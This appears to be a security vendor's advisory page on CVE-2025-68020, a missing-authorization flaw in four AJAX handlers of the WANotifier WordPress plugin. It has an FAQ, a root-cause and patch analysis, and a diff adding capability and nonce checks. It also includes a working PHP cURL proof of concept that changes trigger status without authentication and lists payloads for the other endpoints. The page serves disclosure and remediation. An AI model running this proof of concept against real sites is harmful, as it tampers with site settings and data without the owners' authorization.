What is CVE-2025-68020?

CVE-2025-68020 is a missing authorization vulnerability in the WANotifier plugin for WordPress, affecting versions up to and including 2.7.12. This flaw allows unauthenticated attackers to perform unauthorized actions through AJAX endpoints.

How does this vulnerability work?

The vulnerability arises from four AJAX handler functions that do not check user capabilities or verify nonces. Attackers can send POST requests to specific endpoints to change notification trigger statuses, fetch trigger fields, preview button styles, and access activity logs without authentication.

Who is affected by this vulnerability?

Any WordPress site using the WANotifier plugin version 2.7.12 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the WANotifier plugin installed on your WordPress site. If it is version 2.7.12 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is patched in version 2.7.13 of the WANotifier plugin. Update your plugin to this version or later to ensure that proper capability checks and nonce verifications are in place.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the WANotifier plugin until a secure version can be installed. This will prevent unauthorized access through the vulnerable functions.

What does a Medium severity rating mean?

A Medium severity rating indicates that the vulnerability poses a moderate risk to systems. While exploitation may require some effort, successful attacks can lead to unauthorized access and control over administrative functionalities.

What is the CVSS score for this vulnerability?

The CVSS score for CVE-2025-68020 is 5.3, which reflects a moderate risk level. This score considers factors such as the ease of exploitation and the potential impact on the system.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can send a crafted POST request to the vulnerable AJAX endpoint without authentication. It demonstrates the ability to change the status of notification triggers, highlighting the lack of authorization checks.

What are the potential impacts of this vulnerability?

Successful exploitation can allow attackers to enable or disable notification triggers, access sensitive configuration data, and disrupt notification workflows. This unauthorized access can lead to further compromises if chained with other vulnerabilities.

What are nonce checks and why are they important?

Nonce checks are security tokens used in WordPress to verify that requests are legitimate and originate from authenticated users. They help prevent CSRF attacks and are crucial for protecting AJAX endpoints from unauthorized access.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68020: WANotifier <= 2.7.12 – Missing Authorization (notifier)

CVE ID CVE-2025-68020

Plugin notifier

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.7.12

Patched Version 2.7.13

Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68020:
The WANotifier WordPress plugin contains a Missing Authorization vulnerability in versions up to and including 2.7.12. This flaw allows unauthenticated attackers to execute privileged administrative functions via AJAX endpoints. The vulnerability affects the plugin’s core administrative functionality, enabling unauthorized control over notification triggers and system settings.

Root Cause:
The vulnerability stems from four AJAX handler functions that lack proper capability checks and nonce verification. The affected functions are `notifier_change_trigger_status()` in class-notifier-notification-triggers.php (line 709), `notifier_fetch_trigger_fields()` in the same file (line 728), `preview_btn_style()` in class-notifier-settings.php (line 614), and `fetch_activity_logs_by_date()` in class-notifier-tools.php (line 188). Each function processes POST requests without validating if the user has the `manage_options` capability or verifying WordPress nonces.

Exploitation:
Attackers can send POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to specific AJAX hooks. For trigger status changes, attackers use `action=notifier_change_trigger_status` with `post_id` and `enabled` parameters. For fetching trigger fields, they use `action=notifier_fetch_trigger_fields` with `post_id` and `trigger` parameters. For button previews, they use `action=preview_btn_style` with `btn_style` parameter. For activity logs, they use `action=fetch_activity_logs_by_date` with `notifier_activity_date` parameter. No authentication or nonce tokens are required.

Patch Analysis:
The patch in version 2.7.13 adds two security layers to each vulnerable function. First, each function now checks `current_user_can(‘manage_options’)` before processing requests. Second, each function verifies a WordPress nonce using `wp_verify_nonce()` with specific nonce actions. The patch also adds nonce generation to the JavaScript localization in class-notifier.php (line 184-191) and implements input sanitization using `intval()` and `sanitize_text_field()` on POST parameters.

Impact:
Successful exploitation allows unauthenticated attackers to enable or disable notification triggers, retrieve sensitive trigger configuration data, preview chat button styles, and access activity logs. This constitutes unauthorized administrative access to the plugin’s core functionality. Attackers could disrupt notification workflows, gather sensitive configuration information, and potentially chain this vulnerability with other flaws for further system compromise.

Differential between vulnerable and patched code

Code Diff

--- a/notifier/includes/class-notifier.php
+++ b/notifier/includes/class-notifier.php
@@ -23,7 +23,7 @@
 	 * Define Constants.
 	 */
 	private function define_constants() {
-		$this->define( 'NOTIFIER_VERSION', '2.7.12' );
+		$this->define( 'NOTIFIER_VERSION', '2.7.13' );
 		$this->define( 'NOTIFIER_NAME', 'notifier' );
 		$this->define( 'NOTIFIER_PREFIX', 'notifier_' );
 		$this->define( 'NOTIFIER_URL', trailingslashit( plugins_url( '', dirname(__FILE__) ) ) );
@@ -181,7 +181,15 @@
     	wp_localize_script(
     		NOTIFIER_NAME . '-admin-js',
     		'notifierObj',
-    		apply_filters( 'notifier_js_variables', array('ajaxurl' => admin_url( 'admin-ajax.php' ) ) )
+    		apply_filters( 'notifier_js_variables', array(
+    			'ajaxurl' => admin_url( 'admin-ajax.php' ),
+    			'nonces' => array(
+    				'preview_btn_style' => wp_create_nonce( 'notifier_preview_btn_style' ),
+    				'fetch_activity_logs' => wp_create_nonce( 'notifier_fetch_activity_logs' ),
+    				'change_trigger_status' => wp_create_nonce( 'notifier_change_trigger_status' ),
+    				'fetch_trigger_fields' => wp_create_nonce( 'notifier_fetch_trigger_fields' )
+    			)
+    		) )
     	);

     	// Styles
--- a/notifier/includes/classes/class-notifier-notification-triggers.php
+++ b/notifier/includes/classes/class-notifier-notification-triggers.php
@@ -709,14 +709,30 @@
 	 * Enable / disable trigger
 	 */
 	public static function notifier_change_trigger_status(){
-		$post_id = isset($_POST['post_id']) ? $_POST['post_id'] : 0;
-		$enabled = isset($_POST['enabled']) ? $_POST['enabled'] : 'no';
+		// Security check: Verify user has manage_options capability
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array(
+				'message' => 'You do not have permission to perform this action.'
+			) );
+		}
+
+		// Verify nonce for additional security
+		if ( ! wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'notifier_change_trigger_status' ) ) {
+			wp_send_json_error( array(
+				'message' => 'Security check failed.'
+			) );
+		}
+
+		$post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0;
+		$enabled = isset($_POST['enabled']) ? sanitize_text_field($_POST['enabled']) : 'no';
+
 		if('wa_notifier_trigger' != get_post_type($post_id)){
 			wp_send_json( array(
 				'error' => true,
 				'message'  => 'Invalid post type.'
 			) );
 		}
+
 		update_post_meta( $post_id, NOTIFIER_PREFIX . 'trigger_enabled' , $enabled);
 		wp_send_json( array(
 			'error' => false,
@@ -728,8 +744,22 @@
 	 * Fetch trigger fields for a speicific trigger
 	 */
 	public static function notifier_fetch_trigger_fields(){
-		$post_id =  isset($_POST['post_id']) ? $_POST['post_id'] : 0;
-		$trigger =  isset($_POST['trigger']) ? $_POST['trigger'] : '';
+		// Security check: Verify user has manage_options capability
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array(
+				'message' => 'You do not have permission to perform this action.'
+			) );
+		}
+
+		// Verify nonce for additional security
+		if ( ! wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'notifier_fetch_trigger_fields' ) ) {
+			wp_send_json_error( array(
+				'message' => 'Security check failed.'
+			) );
+		}
+
+		$post_id =  isset($_POST['post_id']) ? intval($_POST['post_id']) : 0;
+		$trigger =  isset($_POST['trigger']) ? sanitize_text_field($_POST['trigger']) : '';

 		$data_fields = get_post_meta( $post_id, NOTIFIER_PREFIX . 'data_fields', true);
 		$recipient_fields = get_post_meta( $post_id, NOTIFIER_PREFIX . 'recipient_fields', true);
--- a/notifier/includes/classes/class-notifier-settings.php
+++ b/notifier/includes/classes/class-notifier-settings.php
@@ -614,6 +614,20 @@
 	 * Show Chat Button Preview
 	 */
 	public static function preview_btn_style(){
+		// Security check: Verify user has manage_options capability
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array(
+				'message' => 'You do not have permission to perform this action.'
+			) );
+		}
+
+		// Verify nonce for additional security
+		if ( ! wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'notifier_preview_btn_style' ) ) {
+			wp_send_json_error( array(
+				'message' => 'Security check failed.'
+			) );
+		}
+
 		$btn_style = isset($_POST['btn_style']) ? sanitize_text_field($_POST['btn_style']) : '';

 		$button_styles = self::get_button_styles();
--- a/notifier/includes/classes/class-notifier-tools.php
+++ b/notifier/includes/classes/class-notifier-tools.php
@@ -188,6 +188,20 @@
      * Fetch all activity info for current user by date
      */
     public static function fetch_activity_logs_by_date() {
+        // Security check: Verify user has manage_options capability
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( array(
+                'message' => 'You do not have permission to perform this action.'
+            ) );
+        }
+
+        // Verify nonce for additional security
+        if ( ! wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'notifier_fetch_activity_logs' ) ) {
+            wp_send_json_error( array(
+                'message' => 'Security check failed.'
+            ) );
+        }
+
         $activity_date = isset($_POST['notifier_activity_date']) ? sanitize_text_field($_POST['notifier_activity_date']) : '';

         global $wpdb;
--- a/notifier/notifier.php
+++ b/notifier/notifier.php
@@ -3,7 +3,7 @@
  * Plugin Name: Send Notifications from Woocommerce, Form Plugins and More!
  * Plugin URI: https://wordpress.org/plugins/notifier/
  * Description: WhatsApp API integration to send WhatsApp notifications from Woocommerce, Contact Form 7, Gravity Forms, WPForms & more.
- * Version: 2.7.12
+ * Version: 2.7.13
  * Author: WANotifier
  * Author URI: https://wanotifier.com
  * Text Domain: notifier

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68020 - WANotifier <= 2.7.12 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-68020
 * Demonstrates unauthorized trigger status change in WANotifier plugin
 */

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// Prepare the POST data for changing trigger status
$post_data = array(
    'action' => 'notifier_change_trigger_status',
    'post_id' => 123,  // Target trigger post ID
    'enabled' => 'yes' // Enable the trigger
);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // Parse JSON response
    $json_response = json_decode($response, true);
    if (isset($json_response['error']) && $json_response['error'] === false) {
        echo "[SUCCESS] Trigger status changed successfullyn";
        echo "Message: " . $json_response['message'] . "n";
    } else {
        echo "[FAILED] Exploit attempt unsuccessfuln";
        if (isset($json_response['message'])) {
            echo "Error: " . $json_response['message'] . "n";
        }
    }
}

// Close cURL session
curl_close($ch);

// Additional exploitation examples for other vulnerable endpoints
/*
// Example 1: Fetch trigger fields
$post_data = array(
    'action' => 'notifier_fetch_trigger_fields',
    'post_id' => 123,
    'trigger' => 'wc_order_status_changed'
);

// Example 2: Preview button style
$post_data = array(
    'action' => 'preview_btn_style',
    'btn_style' => 'style1'
);

// Example 3: Fetch activity logs
$post_data = array(
    'action' => 'fetch_activity_logs_by_date',
    'notifier_activity_date' => '2024-01-01'
);
*/
?>

Frequently Asked Questions

What is CVE-2025-68020?
Overview of the vulnerability
CVE-2025-68020 is a missing authorization vulnerability in the WANotifier plugin for WordPress, affecting versions up to and including 2.7.12. This flaw allows unauthenticated attackers to perform unauthorized actions through AJAX endpoints.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability arises from four AJAX handler functions that do not check user capabilities or verify nonces. Attackers can send POST requests to specific endpoints to change notification trigger statuses, fetch trigger fields, preview button styles, and access activity logs without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WANotifier plugin version 2.7.12 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the WANotifier plugin installed on your WordPress site. If it is version 2.7.12 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.7.13 of the WANotifier plugin. Update your plugin to this version or later to ensure that proper capability checks and nonce verifications are in place.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the WANotifier plugin until a secure version can be installed. This will prevent unauthorized access through the vulnerable functions.
What does a Medium severity rating mean?
Understanding risk levels
A Medium severity rating indicates that the vulnerability poses a moderate risk to systems. While exploitation may require some effort, successful attacks can lead to unauthorized access and control over administrative functionalities.
What is the CVSS score for this vulnerability?
Context of the CVSS score
The CVSS score for CVE-2025-68020 is 5.3, which reflects a moderate risk level. This score considers factors such as the ease of exploitation and the potential impact on the system.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept provided shows how an attacker can send a crafted POST request to the vulnerable AJAX endpoint without authentication. It demonstrates the ability to change the status of notification triggers, highlighting the lack of authorization checks.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can allow attackers to enable or disable notification triggers, access sensitive configuration data, and disrupt notification workflows. This unauthorized access can lead to further compromises if chained with other vulnerabilities.
What are nonce checks and why are they important?
Security mechanism explanation
Nonce checks are security tokens used in WordPress to verify that requests are legitimate and originate from authenticated users. They help prevent CSRF attacks and are crucial for protecting AJAX endpoints from unauthorized access.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations